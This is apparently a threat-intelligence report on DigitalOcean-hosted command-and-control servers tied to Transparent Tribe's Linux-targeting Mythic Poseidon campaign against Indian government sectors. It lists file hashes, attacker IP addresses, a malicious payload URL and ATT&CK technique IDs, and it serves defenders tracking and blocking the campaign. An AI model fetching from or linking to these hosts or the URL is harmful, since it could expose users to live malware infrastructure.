OSINT Investigation: Hunting Malicious Infrastructure Linked to Transparent Tribe
Sept. 30, 2024, 10:53 a.m.
Description
This investigation tracked infrastructure linked to the APT group Transparent Tribe, identifying 15 malicious hosts on DigitalOcean serving as command-and-control servers for the Mythic exploitation framework. The group employs Linux desktop entry files as an attack vector, targeting individuals in India. The campaign uses Mythic Poseidon binaries as C2 agents, leveraging tactics to evade security and maintain persistence. The investigation utilized JARM fingerprinting and HTML metadata analysis to expose the operational infrastructure, highlighting Transparent Tribe's evolving sophistication in targeting Linux environments, particularly in Indian government sectors.
Tags
Date
- Created: Sept. 30, 2024, 10:42 a.m.
- Published: Sept. 30, 2024, 10:42 a.m.
- Modified: Sept. 30, 2024, 10:53 a.m.
Indicators
- ff7be8a45737507157e0a9e7d291c5f3380e305c223f01a69598a8a9c4fa6f35
- 0cb37745b1a16b28fe60ecb70367fdc625d9f90e068e25f235234efed9b069b9
- 64.23.213.61
- 206.189.134.185
- 178.128.92.166
- 161.35.186.219
- 159.223.0.196
- 159.203.133.189
- 157.245.139.146
- 152.42.245.111
- 152.42.198.168
- 143.198.64.151
- 142.93.74.10
- 138.197.156.131
- 137.184.211.26
- 64.23.155.109
- 165.232.118.207
- 139.59.109.136
- http://157.245.139.146/trs-clip
Attack Patterns
- Mythic
- Poseidon
- Transparent Tribe
- T1048
- T1564.001
- T1059.004
- T1113
- T1071.001
- T1070.004
- T1204.002
- T1547
- T1082
- T1566.001
- T1083
- T1027
- T1566
- T1059
Additional Informations
- Defense
- Government
- British Indian Ocean Territory
- India